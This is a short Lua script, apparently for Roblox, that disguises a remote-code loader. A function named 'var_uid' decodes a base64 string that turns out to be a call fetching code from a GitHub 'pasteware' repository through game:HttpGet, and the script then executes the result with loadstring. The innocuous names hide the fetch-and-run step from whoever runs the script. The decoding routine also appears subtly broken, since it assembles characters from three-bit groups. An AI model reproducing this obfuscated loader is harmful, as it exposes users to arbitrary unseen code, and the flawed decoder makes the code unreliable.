function var_uid(data)
local b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
data = string.gsub(data, "[^"..b.."=]", "")
return (data:gsub(".", function(x)
if (x == "=") then return "" end
local r,f="",(b:find(x)-1)
for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and "1" or "0") end
return r;
end):gsub("%d%d%d?", function(x)
if (#x < 3) then return "" end
local c=0
for i=1,3 do c=c+(x:sub(i,i)=="1" and 2^(3-i) or 0) end
return string.char(c)
end))
end

local pulleduid = var_uid("bG9hZHN0cmluZyhnYW1lOkhUVEdldCgnaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1poaWVhZWRpZS9wYXN0ZXdhcmUvbWFpbi81MDUwY29taXQnKSk()")

loadstring(pulleduid)()
